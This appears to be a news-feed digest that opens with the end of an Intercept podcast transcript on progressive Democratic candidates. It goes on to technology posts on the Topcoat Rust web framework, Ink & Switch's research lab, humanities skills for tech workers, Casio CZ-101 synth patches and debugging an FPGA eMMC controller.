It doesn’t stop there. As much as people want to say every city is not New York — well New York is not Philly , is not Denver , is not Dallas, is not California, is not Tennessee. Let’s be fucking for real. This is happening across the country. There is a bloc of leaders across the country who are actually responding to the needs of the working class.

Like I said, they got elected on a mandate to challenge the Democratic establishment. They will be pushing this Democratic Party to meet the needs of voters, be it pushing for Medicare for All, or an arms embargo on Israel, or a stop to AI data centers , or raising taxes on billionaires . All universally popular fucking policies that the Democratic Party could lead on.

So often this question has been framed as, what will the left do when they get to Congress? How will they deal with these sorts of institutions? We should be asking Hakeem Jeffries and Chuck Schumer and everyone else that question far more, which is: What are you going to do about the fact that your electorate is making clear that you are not fighting for the policies they are looking for?

When you come out to say you oppose Medicare for All after being a co-sponsor for it for a few cycles, you are in the minority of Democratic voters. I promise in your district particularly I imagine maybe, what, 5 percent of voters agree with you. It’s incumbent upon Democratic leadership to wake up and decide where they want to be on these issues and how they want to lead this party, because do they want to be a one-term House majority?

They can win back the majority a lot because Republicans are failing and because the left is showing voters what an opposition party could actually look like and what a governing party could actually look like. The establishment is not doing that. Until they start taking lessons from the left on what to actually fight for, they will continue to be running on cycle-to-cycle losses and wins instead of really looking at, long-term, how can we take back power and ensure that we don’t consistently backside into this fascist and authoritarian regime that is overrun by the same corporate interests that the Democratic establishment is also funded by.

We absolutely are looking at this new crop of leaders joining this already existing group of progressives to really have a sizable influence in bringing the people’s power to the halls of Congress more than anything, and using their coordinated megaphones in many ways to bring light to the issues that people need them to.

Because even if we take back the House majority, Donald Trump is still president, even if we take the Senate back. He can veto any bill, and that’s a reality, but that should not stop us from showing people what we could do if we had power.

“What we could do if we had power should not simply look like turning back the clock to what it looked like before Donald Trump, which is what some of the agenda I’m seeing from Democratic leadership is.”

And what we could do if we had power should not simply look like turning back the clock to what it looked like before Donald Trump, which is what some of the agenda I’m seeing from Democratic leadership is, let’s roll back this. Let’s get this back. The status quo three, two, five, seven, eight, pick a fucking year, was not good enough for working-class people, so why would we go back to that?

Obviously, we need to roll back all these attacks. We need to claw back the destruction that the Trump administration has done, but that’s obviously also not enough. We need universal healthcare. We need housing for all. We need to make billionaires pay their fair share. We need to stop fucking AI data centers from destroying every community, and raising our utility bills and poisoning our water. There are a litany of crises that we are facing. Mealy-mouthed solutions are not what Democratic voters are looking for.

They are making that deeply clear, and no matter how much fear-mongering around socialism or the Red Scare you want to do, the truth is, voters support these policies because these policies support voters.

AL: If we’re picking years, I pick 2004. [Laughter] I think you’re onto something there. We’re going to leave it there, Usamah. Thank you so much for joining me on The Intercept Briefing.

UA: Thank you, Akela.

AL: We want to hear from you. Tell us what you’re following or want to see more coverage of. Email us at podcasts@theintercept.com or leave us a voice mail at 530-POD-CAST that’s 530-763-2278

That does it for this episode.

This episode was produced by Laura Flynn. Jordan Uhl is our social media producer. Ben Muessig is our editor-in-chief. Maia Hibbett is our managing editor.

Nara Shin is our copy editor. William Stanton mixed our show. Legal review by David Bralow.

Slip Stream provided our theme music.

This show and our reporting at The Intercept do not exist without you. Your donation, no matter the amount, makes a real difference. Keep our investigations free and fearless at theintercept.com/join .

And if you haven’t already, please subscribe to The Intercept Briefing wherever you listen to podcasts. Do leave us a rating or a review, it helps other listeners to find our reporting.

Until next time, I’m Akela Lacy.

Topcoat is pushing the boundary of server applications with Rust

Hacker News
tokio.rs
2026-09-25 05:59:40
Comments...
Original Article

Two months ago, we ( Julien and I ) announced Topcoat , a batteries-included full-stack Rust framework. It includes views, components, mailers, an ORM ( Toasty ), and more. Topcoat aims to make building web apps with Rust as productive as any other language. We have been hard at work shipping features, so it is a good time to talk about what is new.

I started my career as a professional software developer building web applications with Ruby on Rails. At the time, the “build a blog in 15 minutes” video was groundbreaking. Back then, building software was tedious: writing boilerplate instead of shipping features. Ruby on Rails challenged that and proved you could be productive and that building software could also be fun. I fell in love with Ruby on Rails, worked on the core team for a few years, and am still a top 50 all-time contributor to Ruby on Rails. Having been through that period, it is hard to overstate how impactful the Ruby on Rails philosophy was on software development in general.

Since then, I have spent the past 13 years or so building up Rust’s networking ecosystem. While Rust has gained broad adoption at the infrastructure level, I have always had higher-level application development in my sights, including the same space Ruby on Rails occupies. I've wanted to capture some of the magic I felt when I built Ruby on Rails applications, but with Rust (who doesn’t like really, really fast applications that take ~20MB of RAM?).

I will be the first to say Rust isn't as elegant as some other modern languages, but I'd definietly rather work with Rust than pour acid into my eyes. Also, most higher-level applications can get away with minimal use of lifetimes and generics. Rust is very expressive. Applications built with Rust and well-designed libraries can look nice.

Rust is the best general-purpose language for the new world of AI-driven development. That includes building web applications or any server application, really. The role of libraries and frameworks in this new world is still up in the air. The cost of ditching a library or framework and using a bespoke solution has gone down, but not disappeared entirely. They will continue to play a substantial, but slightly different role. Well-defined conventions and abstractions will help the LLM work faster, with fewer tokens and fewer errors. That is fundamentally why I am still pushing for a batteries-included framework for Rust.

I partnered with Julien, who has been leading the front-end design of Topcoat while I mostly focus on Toasty and the DB layer. We are still figuring out exactly what this new framework should look like, but it is shaping up to be something very nice.

With that, what is new with Topcoat and Toasty?

Client-side reactivity in Topcoat 0.9 and beyond

Today, we published Topcoat v0.9 .

When starting to build a web framework, you typically choose to either build a browser-side renderer or a server-side renderer. If you start with browser rendering, the challenge becomes getting data from the server to the browser and rendering the initial page as quickly as possible. If you start on the server, data access and initial page load become easy, but now latency and client-side responsiveness become the bottleneck. Regardless of where you start, you typically converge more and more towards the middle to get the best of both worlds. We believe server-side rendering is the best default for most web apps, but we want to make sure you can drop down to fully interactive, zero-latency UIs when needed.

Tracking client signals on the server

Topcoat started with signals and a special runtime expression syntax inside the view! macro: a fully type-checked subset of Rust that can be transpiled to JavaScript and re-run in the browser. The idea is to have as much of the rendering and business logic on the server, and only sprinkle in runtime expressions to bridge the latency gap, for example by revealing a loading spinner or changing some class attributes. With a system like this, it is possible to build basic interactivity while avoiding server roundtrips entirely:

#[page]
pub async fn page(cx: &Cx) -> Result<impl View> {
    // This state variable is initialized on the server, but lives in the browser.
    let count = signal(cx, || 0i32);

    Ok(view! {
        <button @click=$(|_e| count.increment())>"increment"</button>
        <button @click=$(|_e| count.decrement())>"decrement"</button>

        // The count updates when clicking the buttons. No server roundtrip.
        <div>$(count.get())</div>
    })
}

However, by themselves, Topcoat’s runtime expressions fall short when you need to make changes to the structure of the markup itself. To fix this, we added shards, which are a special type of component that can be re-rendered on the server whenever their arguments change:

#[component]
async fn search(cx: &Cx) -> Result<impl View> {
    let query = signal(cx, String::new);

    Ok(view! {
        <input @input=$(|e: Event| query.set(e.target.value))>

        // Search results are updated as the input changes.
        search_results(query: $(query.get()))
    })
}

#[shard]
async fn search_results(cx: &Cx, query: String) -> Result<impl View> {
    // This markup is rendered on the server and can access the database.
    Ok(view! {
        <ul>
            for product in search_products(cx, &query).await? {
                <li>(product.name)</li>
            }
        </ul>
    })
}

When the query signal changes, the browser sends its current value to the server, which reruns the shard and responds with updated HTML.

In Topcoat 0.8 , reacting to signal changes became even easier. You can now read a signal while rendering your UI on the server. Since the outcome depends on whatever values the signals have, Topcoat will refetch just those parts of your page that track the signal value:

#[shard]
pub async fn search(cx: &Cx) -> Result<impl View> {
    let query = signal(cx, String::new);
    // The signal is read here, meaning the shard will re-run
    // on the server whenever the browser-side state changes.
    let products = search_products(cx, &query.get()).await?;

    Ok(view! {
        // The input event handler still runs in the browser.
        <input @input=$(|e: Event| query.set(e.target.value))>

        <ul>
            for product in products {
                <li>(product.name)</li>
            }
        </ul>
    })
}

Updated HTML elements are morphed to avoid loss of focus or input state. Even an entire page can be re-rendered in response to a signal change, providing significantly more expressiveness.

Streaming UI changes from the server

Responding to client state changes on the server is great, but what if you want to update the UI in response to a server-side state change? For this use case, Topcoat provides the live! and emit! macros. A live! view is a special type of view! that can emit unlimited UI updates.

A simple example is “streaming SSR,” or “suspense.” The goal is to render a loading skeleton as quickly as possible while waiting for data. Once the data is available, you can swap in the real page content. Topcoat provides suspense and error_boundary components out of the box that behave similarly to React and other web frameworks. That said, you can achieve a similar effect with a live view:

#[page]
pub async fn page() -> Result<impl View> {
    Ok(live! {
        // First, emit a loading indicator.
        emit! { <p>"Loading..."</p> }?;

        // Then, load the data.
        let content = load_content().await;

        // Finally, swap in the full UI.
        emit! { <p>(content)</p> }
    })
}

A more advanced use case is to emit a progress indicator that updates many times as the page loads:

#[page]
pub async fn page(cx: &Cx) -> Result<impl View> {
    Ok(live! {
        // Start at 0%.
        emit! { <p>"Working... 0%"</p> }?;

        while let Some(progress) = load_more_data(cx).await? {
            // Each time new data arrives, we update the progress indicator.
            emit! {
                <p>
                    "Working... "
                    (progress.percent)
                    "%"
                </p>
            }?;
        }

        emit! { <p>"Done!"</p> }
    })
}

Starting with version 0.9, Topcoat also supports server-push. Instead of streaming only for the initial page load, Topcoat can open a WebSocket connection from the browser to the server and subscribe to UI changes over long-lived connections. This is useful, for example, for a chat interface:

#[component]
pub async fn chat_messages(cx: &Cx) -> Result<impl View> {
    Ok(live! {
        let chat = app_context::<Chat>(cx);
        let mut changed = chat.subscribe();
        loop {
            // Render the current chat state.
            let token = emit! {
                <ul>
                    for message in chat.messages() {
                        <li>(message)</li>
                    }
                </ul>
            }?;

            // During the initial page load, only render once.
            if !connected(cx) {
                break Ok(token);
            }

            // Wait for changes, then re-render the chat box.
            changed.recv().await.ok();
        }
    })
}

Toasty, Topcoat’s DB client

Toasty has received many incremental updates over the months. I’m just going to highlight a few of them quickly.

Expressive updates

Procedural macros are one of Rust’s killer features. A procedural macro-based API can be very expressive while still providing type safety. Toasty uses these heavily to minimize boilerplate when querying, creating, and updating. We recently added the update! macro:

#[derive(Model)]
struct User {
    #[key]
    #[auto]
    id: i64,

    name: String,
    login_count: i64,
}

// let mut user = ...;

toasty::update!(user {
    name: "Alicia",
    login_count.increment(),
})
.exec(&mut db)
.await?;

This runs a single update that sets the name field and increments login_count in the database (without loading it first, something like SET login_count = login_count + 1 ).

Document fields

Toasty is not just for relational data. Document-based databases are common, and most relational databases (including PostgreSQL) support document types, like JSON, including the ability to query document columns. Toasty is adding first-class support for that. Here is a quick example:

#[derive(Model)]
struct User {
    #[key]
    #[auto]
    id: i64,

    name: String,

    #[document]
    settings: Settings,
}

#[derive(Embed)]
struct Settings {
    theme: String,
    notifications: bool,
}

let users = User::filter(
    User::fields().settings().theme().eq("dark"),
)
.exec(&mut db)
.await?;

The user’s settings field is encoded as JSONB in PostgreSQL, and the filter uses PostgreSQL’s JSONB filtering capabilities. The filter query looks like this:

SELECT
    users.id,
    users.name,
    users.settings
FROM users
WHERE users.settings->>'theme' = $1;

Polymorphic relations

Polymorphic relations are relations where the target may be one of multiple types. I have never loved how they worked in ORMs that I have used in the past. Yet, there are valid reasons to need them. Then, I realized that you could basically get polymorphic relations with Toasty by combining enums with regular relations.

#[derive(Embed)]
#[index(id)]
enum Owner {
    User {
        #[shared(id)]
        id: i64,
        #[belongs_to(key = id)]
        user: Deferred<User>,
    },
    Team {
        #[shared(id)]
        id: i64,
        #[belongs_to(key = id)]
        team: Deferred<Team>,
    },
}

#[derive(Model)]
struct Project {
    #[key]
    #[auto]
    id: i64,

    name: String,
    owner: Owner,
}

The #[shared(id)] and #[index(id)] annotations tell Toasty what the table schema looks like. shared says the id field from both enum variants map to the same DB column, and #[index] says to create a database index. And using it works pretty well too:

// Toasty fills the owner's ID from Alice's primary key.
let mut project = toasty::create!(Project {
    name: "Website",
    owner: Owner::User { user: &alice },
})
.exec(&mut db)
.await?;

// Find projects owned by Alice.
let projects = Project::filter(
    Project::fields()
        .owner()
        .user()
        .matches(|owner| owner.user().eq(&alice)),
)
.exec(&mut db)
.await?;

// Transfer ownership to a team.
toasty::update!(project {
    owner: Owner::Team { team: &team },
})
.exec(&mut db)
.await?;

Where to go from here

Look, I don’t know where we are going. The world of software engineering is completely different every three months. Who knows where it will land? I sure as hell don’t. What I do know is that I am very excited. I feel like I am living through science fiction, and the future is bright. Is Rust going to be part of the destination? Maybe. Maybe not. It will definietly play a big part in the journey. There is no reason we can’t maximize productivity AND have a really high-quality app that runs fast and uses little memory.

And for web apps, I will be building with Rust, Topcoat , and Toasty .

To give it a try, follow the getting started guide , and come say hi in the #topcoat channel on the Tokio Discord .

Ink and Switch Interactive Homepage

Hacker News
www.inkandswitch.com
2026-09-25 05:50:25
Comments...
Original Article

An independent research lab exploring the future of tools for thought.

We envision a new computer that amplifies human intelligence. A system that helps you think more clearly, collaborate more effectively, and is available anywhere and anytime. Though the specifics of our work continue to evolve, everything we do is in pursuit of this vision.

Research Areas

Our research spans a wide variety of domains from theoretical computer science to practical user experiences. We focus our research on four primary themes.

Local-first Software

Exploring software architecture that returns data to users and enables collaboration in every tool.

Malleable Software

Designing software environments where people can customize tools in the moment to meet their unique needs.

Programmable Ink

Discovering a dynamic medium for sketching ideas where adding behaviors and interaction is as natural as applying ink to paper.

Universal Version Control

Building tools to help people explore alternatives, keep track of history, and collaborate better, across all kinds of media.

Featured Work

We publish the results of our research here on our website and in academic venues. Below you'll find a selection of our most popular essays and recent lab notebooks. For more, see the complete list of our writing , and subscribe to our newsletter to be notified when we publish new work.

Ambsheets : Spreadsheets for exploring scenarios

Inventing new kinds of spreadsheets for exploring possibility spaces and making better decisions.

Lab Notebook

Keyhive : Local-first access control

A local-first access control system with capabilities and end-to-end encryption for secure & trusted collaboration.

Lab Notebook

Patchwork : Local-first malleable software

A research project into dynamic environments for creative work.

Lab Notebook

Livelymerge : Toward a collaborative programming kernel

A self-sustaining system where the entire object memory is shared simultaneously by multiple users.

Lab Notebook

Embark : Dynamic documents for making plans

An exploration of how live data and computation can gradually enrich informal travel plans.

2023 Essay

Inkbase : Programmable ink

What would be possible if hand-drawn sketches were programmable like spreadsheets?

2022 Essay

Local-first software : You own your data, in spite of the cloud

A new generation of collaborative software that allows users to retain ownership of their data.

2019 Essay

Production Software

Several of our research projects have grown into actively developed, widely used tools.

Allume (formerly Muse)

A digital workspace where users can brainstorm, organize, and connect ideas visually using a flexible canvas for notes, sketches, PDFs, and other media.

Automerge

A library for building collaborative applications that automatically sync changes across devices, even offline, using conflict-free replicated data types (CRDTs).

Lab Meta

Our lab owes its existence to the support of a handful of people and organizations. They share our goal: to help scientists, journalists, and creative thinkers do important work with powerful tools that respect their humanity.

Supporters

Our ongoing research is supported by individual and corporate sponsors, and grants from bodies around the world.

Appearances

Although we are best known for our writing, members of Ink & Switch occasionally present at both industry and academic conferences like the below. For more, see all our past and upcoming appearances .

Local-First Conf

2026 JUL 12-14

The whole lab was in Berlin for Local-First Conf, including a special Lab Day where we shared our latest progress on Patchwork, PlayBook, Automerge, and other projects.

GodotCon

2026 APR

Lilith Duncan gave a talk about Backstitch , a plugin for the Godot game engine that adds Automerge-powered version control and collaboration.

Tech Needs Humanists More

Hacker News
passo.uno
2026-09-25 05:31:34
Comments...
Original Article

Posted on Sep 7, 2026 · 5 min read

Whoever speaks badly, thinks badly and lives badly. We must find the right words: words are important! — Nanni Moretti

A reader reached out to me the other day to talk about the future of tech writing as a profession. They asked me a pretty good question: What skills would you prioritize in this age of constant change and uncertainty? Is it AI? Maybe coding? Well, not really.

My suggestion is to go back to the humanities and learn a language or two (not the ones you use to code; the other kind). When AI can take care of retrieving facts and putting words together in reassuringly trite ways, your edge as a carbon-based lifeform lies in your ability to go deep , have stances, and know how to convey and defend them. You can do that if you train in the dojo of Plato and Chomsky.

Let me offer an alternative to learning a trade like plumbing or carpentry. Cast the monkey wrench aside for a moment. Instead, start looking at the intellectual foundations of human culture and consider studying philosophy (of any kind), literature, linguistics (the computational flavor is OK), math, history, or anthropology. If you already hold a degree in that area, it’s time to dust it off. And if going back to university is not your thing (I know it’s not mine), self-study is the way to go. If you’re an engineer, adding a bundle of Classics to your skill tree will do you good. Not that degrees guarantee you’ll become a thinker, mind you, but some of it might stick on you still.

As counterintuitive as it might sound in this age of reckless tech and unstoppable progress, the only way forward is down to the roots of human thought and theory. A growing share of knowledge work is not far from becoming a polite exchange of statements between AI agents, mediated by that patina of human ritual that we call professionalism. Less charitable takes represent the humans in the loop as “ meat proxies .” The way to break these self-imposed, lazy shackles is what it has always been: taking a long detour, paving new paths, and coming up with your own thoughts, however wrong they may feel to you.

How to wire things together still matters, of course, but for most developers it has rarely been enough. Many developers are not great merely because of their knowledge of Java boilerplate and Bash tips and tricks, as many tech writers are not great due to their command of Markdown or DITA: professionals are great because they know how to learn fast, how to think hard, and how to picture whole systems in their minds , including their hairy human factors. You can still decide to become highly proficient at purely technical skills, but this is no longer the only direction for growth in tech, and possibly not the most urgent to cover.

Don’t fall into the trap of thinking this is the stuff of academia and ivory towers on leafy campuses. Philosophy of mind, philosophy of science, computational linguistics, cognitive science… They all helped supply the conceptual foundations of the AI systems we’re now building. Logic and ontology reign supreme in software, from database design to information architecture. UX design draws heavily on the arts and anthropological accounts of tools and their use. Projects such as NOPE turn clinical psychology into standards for safer AI behavior. Linguistics and literary theory can help us find the source of beautiful docs .

What does this mean in practice? A lot of different and exciting things. It could mean, for instance, learning to read project proposals closely enough to detect bullshit, constructing an argument that survives disagreement, separating evidence from inference, or recognizing when the wheel is being reinvented. None of these are exclusive to academia. You need these skills to question AI output, design information architectures that make sense to humans, and explain products whose hardest problems are more concerned with ideas than with technical challenges. They are the skills that will help you address real user needs .

I mentioned languages. Another thing that helps a lot when learning how to think is learning the languages in which thoughts have been created, or not yet created. After learning some basic Persian a few years ago, I’m now gearing up for the somewhat foolish task of learning Mandarin Chinese, not because I expect to be able to work or write in it (that’s wishful thinking), but because the mere act of attempting to think in a radically different language is a majestic Trojan horse carrying culture, history, and different worldviews. The more you expose yourself to different languages and cultural substrates, the easier you’ll navigate problems.

So yeah, my advice is to begin your own Grand Tour . Become the most flexible, underscore-shaped mind you can cultivate, the best-prepared proto-diplomat and translator of cultures, the family philosopher (because you no longer need someone to fix your printer). Become a humanist in tech, like the ones AI labs are hiring , someone ready to explore product depths from novel angles.

I used to say that the most useful thing I learned was how to find your way in a library. What I’m telling you here is the upgraded version of that advice: learn how to read the map of the world, and then be ready to navigate it using the tools at your disposal. The rest are implementation details.

We have to go back —Several characters from Lost


Boards of Casio

Hacker News
www.ambionix.com
2026-09-25 05:26:01
Comments...
Original Article

While working away on the CZP-1 , which was at least initially an effort to create a Casio CZ-101 on a web page I happened to see this YouTube video by oliveoil22:

The immediate question was “How can I make those sounds in the CZP-1?”. Luckily for me oliveoil22 had also shared their CZ-101 patch data . . .

Boards of Casio patch data

  1. Download the patch data here .
  2. Open the CZP-1 and turn it on by pressing Power. (Make sure your device is not in silent mode!)
  3. In the “Library” panel under “Banks” select an empty slot from drop down menu.
  4. Select the (“Load bank from JSON file”) button and choose the file you downloaded, probably in your Downloads directory.
  5. Now the bank program data has been replaced by the loaded Boards of Casio patches, so under “Programs” you can select one of the loaded sounds.
  6. Touch the on screen keyboard, or play notes with your computer keyboard, or if you are adventurous use the MIDI facilities to connect an external keyboard.

Note the CZP-1 doesn’t include the post processing effects oliveoil22 has in their patches, and that accounts for most of the differences, but it is otherwise very close.

The CZP-1 saves the banks you have loaded in different slots in your browser so as long as you don’t use private browsing you will find it remembers them between sessions. This also operates across tabs, so all CZP-1 tabs will see the same bank data loaded, but you can select different banks and programs in different tabs.

If you want to empty a bank you unload it with the (“Remove bank”) button.

Sharing sounds with urls

The CZP-1 doesn’t just support sharing sounds by loading and saving json files, you can also just share urls.

For example here is another sound.

To make these urls you just make the sound you want and in the Library under Programs hit “Share” which copies the url to your device clipboard.

The url encodes the data in itself. There is no sound data stored on the server, and you can freely send urls between devices.

Check out more in the the introductory blog post or the full CZP-1 Manual .

Hang on, what? Again?

The twist here was how this was done. I downloaded the patch data from the Google Drive oliveoil22 links to on the YouTube video page, guessed it was probably system exclusive MIDI data from the “syx” extension, told the Claude that had done the last pass of the CZP-1 audio engine and five minutes later I had the json file of the bank containing the patch data for loading into the CZP-1.

If you tried to do this kind of thing in the before times this is mind bending stuff.

Finally. thank you to oliveoil22 who deserves the credit of anything good about that patch data. I assume you’re cool with this, if not let me know.

What are you doing this weekend?

Lobsters
lobste.rs
2026-09-25 05:13:44
Feel free to tell what you plan on doing this weekend and even ask for help or feedback. Please keep in mind it’s more than OK to do nothing at all too!...
Original Article

Feel free to tell what you plan on doing this weekend and even ask for help or feedback.

Please keep in mind it’s more than OK to do nothing at all too!

eMMC Failed. Why?

Lobsters
zipcpu.com
2026-09-25 05:08:32
Comments...
Original Article

I often enjoy posting a “bug-of-the week” on X . Following a recent bug post , someone asked me how I found such bugs:

How do you find these bugs?  Are you running simulations or whatever with tests or did you just notice it[?]

So I thought I might share the following story, in illustration of how a bug can be found.

It started a couple weeks ago, when a friend recently pointed me to an Open Source eMMC controller posted by Lattice Semiconductor on GitHub . He asked me for my thoughts.

My first response was, well, gosh, that’s nothing new. I’ve done that already. My next thought was, may God bless them for their hard work. Then, when reading their landing page , I came across a list of not-yet-implemented capabilities. I’ve got all those, I thought, I just haven’t yet demonstrated them on hardware. I’ve proven them in simulation and formal, just not on hardware.

Fig 1. Already Implemented Features

So I responded to my friend with the image in Fig. 1 to discuss our differences. My own eMMC controller , I explained, can handle all of those capabilities that they haven’t yet implemented. The formal proofs all pass, and we have simulations to demonstrate all of them.

The one thing I didn’t have was a hardware demonstration.

But, I had hardware. It’s a new hardware board from PCB Arts , one we are calling the “ KlusterLab ” board because of all of the capabilities on the board. As of today, it hasn’t been fully tested. (That’s on me, I’m a bit behind on testing this board.) On the other hand, this was a second generation board, so one might expect everything to work–this time.

It was time for an eMMC demonstration.

No, it didn’t work the first time out. Today, I intend to walk through how I found one of the bugs within my eMMC logic .

A Bit of History

The KlusterLab project is funded by NetIdee , as a project called the “ Fast Open Switch .” The fundamental capability of the board is a 4-way 10Gb Ethernet switch.

I’ve actually written quite a few posts about this project already. Here’s a quick list:

  • Envisioning the Ultimate I2C Controller discusses the design of the I2C controller used within this design. Although this I2C controller has now been used in other projects, this project tested it against 1) a DDR3 memory stick, 2) reading SFP configuration information, 3) controlling an Si5324 clock generator, 4) HDMI EDID, and 5) an SSD OLED controller.

    Here, for example, is a picture of the OLED device showing a set of logos sideways. (Oops) The sideways part was easily fixed–I just don’t have an updated picture on hand. The I2C controller has since been updated for Run-Length Encoding so the instruction set is now much more compact.

Fig 2. OLED Logos

As a side note, I started writing a user guide for this I2C controller the last week, only to be surprised at all the details that needed discussion: how the IP works (a topic to be expected), the instruction set it uses , the instruction compiler , the software library associated with it, and more. So this is still coming.

So we’ve discussed this before. Indeed, one of the things I enjoy about working on open source projects is the ability to discuss them on this blog.

I expected it to “just work”

With all of this background, and given that the eMMC controller worked on the previous version of this board, I didn’t expect any failures when I fired it up and ran my eMMC software test .

Much to my surprised, the eMMC came right up and passed my startup test , but then it failed every subsequent time I ran the same test . If I reloaded the FPGA configuration to the board, then controller would bring the device up again, only to fail again every subsequent time I tested it.

Today, as I’m writing this, it’s been a week or so since it was broken, and so I apologize: I didn’t keep the console log around from when it failed. In general, it would look something like the log in Fig. 3 (taken from a working version).

Fig 3. Example Device Log

The software producing this log may be found in this section of the eMMC software driver . Yes, that’s a “noisy” output in Fig. 3. Yes, it’s easy to get it to be quiet, but when things aren’t working I want the software to be as noisy about what it’s doing as possible–it just makes it easier to debug.

The routine in question is designed to adjust the bus width. The eMMC controller supports 1b, 4b, and 8b data buses. A separate controller, also in the same repository , supports communications over SPI. As per the spec, the controller must start in 1b mode and only transition to 4b or 8b after testing and proving each width. To do this, the driver must go through three steps (all shown in Fig. 3).

  1. It must first tell the controller to issue a SWITCH (CMD6) command of the device. This tells the external device (i.e. the eMMC chip itself) to switch bus widths.

    For those not familiar with eMMC , commands to the device are all 48b: The first 8b start with 2’b01. The ‘0’ acts as a start bit, whereas the ‘1’ indicates a command issued to the chip . The next six bits are the command itself. We’ll be issuing a CMD6 here, so these 8b will be represented by a 0x46 in hex. These 8b are followed 32b of data, a 7b CRC (automatically added by the controller) and a STOP bit. The command bit then idles high.

    The actual physical protocol treats the command wire as a shared wire (in all but SPI modes …). This command wire is pulled up when sending a 1’b1 or grounded to send a 1’b0. At higher speeds, the bus can run in push–pull mode, but for this test we’re still running in this open-drain mode. Indeed, the bottom 8b of the PHY register (8’h03) indicate we’re currently running at 25MHz, and the ‘0’ nibble above that indicate that we’re not yet in push–pull mode.

    Once the command has been sent, the controller tristates the command wire to wait for the device to respond. For a SWITCH (CMD6) command, the device responds with a similar 48b response. Other than the fact that this response starts with 2’b00 instead of 2’b01, the response structure is very like the 48b command it is responding to.

    Specifically, the SWITCH (CMD6) command is followed what is known within the specification as an “R1b” response. I’ll explain, starting with the “R1” portion. In an “R1” response, the device returns a copy of its internal status register in the 32b bits of data. The “R1b” response additionally has the option to pull bit[0] of the data bus low following this response as an indication that the device is busy responding to this new command.

  2. The driver then asks the controller to issue a BUSTEST_W (CMD19). In the case of a BUSTEST_W command, the controller issues a 48b command and then waits for the 48b response as before. There are two differences. The first is that there’s no busy associated with a CMD14–it just gets a basic “R1” response. The second difference is that the BUSTEST_W command to the controller requests that the controller send 4 bytes of data to the device. This data will be sent over the data pins to the device, once the action on the command pin has completed.

    When this design failed, the device never responded to the BUSTEST_W (CMD19) command.

    The controller went on anyway. Sigh. Good error handling is never the first feature of any design.

  3. For the final step, the driver asks the the controller to issue a BUSTEST_R (CMD14). This command also returns an R1 response (status return only, no busy). Once the reply has been sent, the device then returns the data, using 1b, 4b, or 8b of data lines, it has received in the BUSTEST_W back to the controller , save that the first two bits on each data line have been swapped. If the return data is as expected, the test succeeds and the bus may use this width.

    Given that step 2 failed, it should come as no surprise that step 3 also failed.

    The design went on anyway. (I do really need some better software error handling …)

So, what do I know? Given that this design worked on the first version of the board, I know that the hardware (i.e. the PCB) works. All the wires are properly connected. Something is still wrong.

Now, how do you find this sort of bug?

Internal Logic Analyzer

For this, I turn to an internal logic analyzer . AMD(Xilinx) offers an internal logic analysis (ILA) capability as part of Vivado. When I first started working on FPGAs, Xilinx required a separate license to use their ILA. Now I hear they’re going to do it again. In my case, I’m testing this hardware on the other side of the Atlantic Ocean (see Fig. 4 below), from a Raspberry Pi on the KlusterLab board and connected to the FPGA via serial port. (The RPi is also connected to the KlusterLab via an SDIO slave port on the FPGA, but that still needs software to test it.) My point is simply this: I’m not really sure I’d be able to get Vivado to run on this Raspberry Pi , with or without an appropriate license. Instead, I have my compressed Wishbone Scope which I have now used faithfully for many years.

Fig 4. Cross oceanic debugging

So, how does this get set up? Well, the majority of the work is done by AutoFPGA . Still, let’s take a walk through the key steps.

  1. The eMMC controller is first modified to generate 32b of data to be analyzed. When using the compressed version of my Wishbone scope , 31b of these 32 are data of interest while the most significant bit is reserved for a “trigger” that can be used to catch specific items of interest .

    As we’ve discussed before , the scope records over a circular buffer. It is always writing to this buffer prior to the trigger. Once it sees the trigger, it waits a user programmed number of clock cycles (known as the “hold off”) before stopping. The scope may also be triggered via software–which is what I did to debug this issue.

    In this case, we created a set of debugging outputs from the eMMC Controller’s front end I/O handler .

  2. We then create a configuration file for this new “scope”, so that AutoFPGA knows how to connect it to the design. As with most AutoFPGA configurations, this file is primarily a set of copy-paste directions. We also use AutoFPGA ’s inheritance feature, and so tell AutoFPGA to configure this eMMC scope like a compressed Wishbone scope , which will itself be configured like a regular Wishbone scope . Therefore, we finally get to the RTL configuration that will be copied/pasted into the design .

    We next add this scope’s configuration filename to the AutoFPGA command line .

    Now, what happens when we run AutoFPGA ?

    First, AutoFPGA will paste this RTL into the design .

    Next, AutoFPGA will also assign an address, and connect this component to the Wishbone bus . The address is then posted in a register definition file used by any Raspberry Pi (host) helper programs, as well as a more user legible file for use when accessing the device by hand.

    Finally, AutoFPGA will build a board definition header file which can then be used by the ZipCPU (or any SOC) to know what components may be accessed, and what addresses to find them at. Specifically, AutoFPGA pasted a description of a WBSCOPE register structure, together with several useful constants into this file . The address of this scope is also pasted into this board description file , so the ZipCPU will know first that it’s there, and second how to find it in the memory space.

    The design may now be rebuilt with the scope within it. To remove the scope later, all I will need to do will be to remove the scope’s configuration file name from the AutoFPGA command line .

    While this may seem like a lot of steps, the reality is that once the design was originally setup with AutoFPGA , we only needed to adjust three files to add a new scope: 1) we needed to create a scope configuration file to tailor the WBSCOPE’s (already existing) configuration to our purpose. 2) We then needed to adjust the AutoFPGA command line to reference this file. Finally, we 3) ran AutoFPGA to handle all of our bus connectivity and software setup for us.

  3. We can now adjust our ZipCPU software. Specifically, we have two macros defined at the top of the driver’s source which are there for this purpose. We just insert SETSCOPE before we expect a bug, and TRIGGER once we detect the bug.

    Now, we just run our software to capture any data we can of this bug.

  4. The last step is to build a piece of Raspberry Pi software to read this scope’s data back out, and convert it into a VCD file . Thankfully, most of the hard work required to do this is already handled for us. First, we already have a debugging bus that we’ve been using to access our board and load our ZipCPU software onto it. That debugging bus provides us with an easy to use software interface that we can build our control software against. Second, the WBSCOPE repository has a software library that we can use to do the heavy lifting for us. All we need to do is add the definitions of our bits to this library, so we then know how to name the various bits we’ve captured.

Those familiar with AMD(Xilinx)’s ILA might think this to be a lot of steps. I get it. Still, I’m kind of attached to this approach–especially since it works across whatever FPGA chip I might be working with.

With all this as background, we’ve now instrumented our design and we can come back and look at what happened.

What did the scope reveal?

Given that the design was broken, it didn’t take long to get a capture from the scope. Here, you can see the first view of this capture in Fig. 5, shown as a cut of a screen shot using GTKWave .

Fig 5. The full WBSCOPE capture

Wow! 674ms of data, sampled at 100MHz captured in just 4096 four-byte words of RAM? I love this compressed Wishbone scope ! (Yes, that is milli seconds, not microseconds or nanoseconds, but milli seconds.) Yes, this is one of those reasons why I like my ILA better than other ones.

What did this capture show us? We’ll have to zoom in a bit to see more of what’s going on. Therefore, let’s take a look at Fig. 6.

Fig 6. Zooming in

